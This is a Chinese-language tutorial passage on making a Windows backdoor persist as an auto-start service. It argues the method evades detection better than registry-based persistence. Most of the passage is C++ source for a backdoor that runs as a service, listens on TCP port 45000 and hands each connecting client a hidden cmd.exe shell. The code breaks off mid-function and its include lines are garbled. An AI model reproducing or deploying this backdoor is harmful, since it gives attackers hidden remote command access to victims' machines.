简介
Windows NT系统后门要实现自启动,有许多种方法,例如注册表自启动,映像劫持技术,SVCHost自启动以及本章节介绍的服务自启动等方法,其中服务自启动相对于上述其他三种需要修改注册表的启动方式而言更不容易被发现。
//////////////////////////////////////////////////////////////
//
// FileName : ServiceAutoRunDemo.cpp
// Creator : PeterZ1997
// Date : 2018-5-4 23:19
// Comment : Create Service to make the BackDoor Run Automatically
//
//////////////////////////////////////////////////////////////
#include
#include
#include
#include
#include
vc.h> #include
#include
#pragma comment(lib, "ws2_32.lib") using namespace std; #define SERVICE_OP_ERROR -1 #define SERVICE_ALREADY_RUN -2 const unsigned int MAX_COUNT = 255; /// String Max Length const DWORD PORT = 45000; /// Listen Port const unsigned int LINK_COUNT = 30; /// Max Link Number SERVICE_STATUS g_ServiceStatus; SERVICE_STATUS_HANDLE g_hServiceStatus; /** * @brief CallBack Function to Translate Service Control Code * @param dwCode Service Control Code */ void WINAPI ServiceControl(DWORD dwCode) { switch (dwCode) { //服务暂停 case SERVICE_CONTROL_PAUSE: g_ServiceStatus.dwCurrentState = SERVICE_PAUSED; break; //服务继续 case SERVICE_CONTROL_CONTINUE: g_ServiceStatus.dwCurrentState = SERVICE_RUNNING; break; //服务停止 case SERVICE_CONTROL_STOP: g_ServiceStatus.dwCurrentState = SERVICE_STOPPED; g_ServiceStatus.dwWin32ExitCode = 0; g_ServiceStatus.dwCheckPoint = 0; g_ServiceStatus.dwWaitHint = 0; break; case SERVICE_CONTROL_INTERROGATE: break; default: break; } //设置服务状态 if (SetServiceStatus(g_hServiceStatus, &g_ServiceStatus) == 0) { printf("Set Service Status Error\n"); } return; } /** * @brief Start Remote Shell * @lpParam the Client Handle */ DWORD WINAPI StartShell(LPVOID lpParam) { STARTUPINFO si; PROCESS_INFORMATION pi; CHAR cmdline[MAX_COUNT] = { 0 }; GetStartupInfo(&si); si.cb = sizeof(STARTUPINFO); si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)lpParam; si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; si.wShowWindow = SW_HIDE; GetSystemDirectory(cmdline, sizeof(cmdline)); strcat_s(cmdline, sizeof(cmdline), "\\cmd.exe"); while (!CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NULL, NULL, NULL, &si, &pi)) { Sleep(100); } WaitForSingleObject(pi.hProcess, INFINITE); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); return 0; } /** * @brief Service Running Function * @lpParam NULL */ DWORD WINAPI RunService(LPVOID lpParam) { CHAR wMessage[MAX_COUNT] = "<================= Welcome to Back Door >_< ==================>\n"; SOCKET sClient[30]; DWORD dwThreadId[30]; HANDLE hThread[30]; WSADATA wsd; if (WSAStartup(0x0202, &wsd)) { printf("WSAStartup Process Error\n"); return 0; } SOCKET sListen = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0); sockaddr_in sin; sin.sin_family = AF_INET; sin.sin_port = htons(PORT); sin.sin_addr.S_un.S_addr = INADDR_ANY; if (bind(sListen, (LPSOCKADDR)&sin, sizeof(sin))) return 0; if (listen(sListen, LINK_COUNT)) return 0; for (int i = 0; i < LINK_COUNT; i++) { sClient[i] = accept(sListen, NULL, NULL); hThread[i] = CreateThread(NULL, 0, StartShell, (LPVOID)sClient[i], 0, &dwThreadId[i]); send(sClient[i], wMessage, strlen(wMessage), 0); } WaitForMultipleObjects(LINK_COUNT, hThread, TRUE, INFINITE); return 0; } /** * @brief the Main Function of the Service */ void WI